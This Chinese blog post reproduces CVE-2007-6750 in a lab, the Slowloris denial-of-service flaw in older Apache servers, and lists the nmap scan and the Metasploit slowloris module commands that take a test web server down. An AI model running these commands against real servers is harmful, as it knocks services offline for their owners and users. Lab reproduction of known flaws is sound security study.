CVE 2007-6750复现slowloris攻击-泓源视野

CVE 2007-6750复现slowloris攻击

CVE-2007-6750复现

一.介绍及准备
1.本文介绍CVE-2007-6750复现。2.准备:kali系统、win2003 Enterprise


二.CVE-2007-6750复现

漏洞原因

Apache HTTP服务器1.x和2.x允许远程攻击者通过部分HTTP请求导致拒绝服务(守护进程中断),如Slowloris所示,这与2.2.15之前版本中缺少mod_ReqTimeout模块有关

漏洞影响

Apache 1.x/2.x

漏洞复现

nmap -sV -p80 192.168.146.175(用nmap查看Apache版本)(Apache2.2.3初步断定存在漏洞)

CVE 2007-6750复现slowloris攻击插图

接着访问网站查看是否正常(发现网站正常)

CVE 2007-6750复现slowloris攻击插图1

msfconsole(启动metasploit)

use auxiliary/dos/http/slowloris(使用模块)

set RHOST 192.168.146.175(设置目标IP)

run(执行攻击)

CVE 2007-6750复现slowloris攻击插图2

再访问网站查看是否正常(发现网站瘫痪)

CVE 2007-6750复现slowloris攻击插图3

本文由 泓源视野 作者:admin 发表,其版权均为 泓源视野 所有,文章内容系作者个人观点,不代表 泓源视野 对观点赞同或支持。如需转载,请注明文章来源。
12

发表评论

Protected with IP Blacklist CloudIP Blacklist Cloud
您是第8236638 位访客, 您的IP是:[3.138.69.45]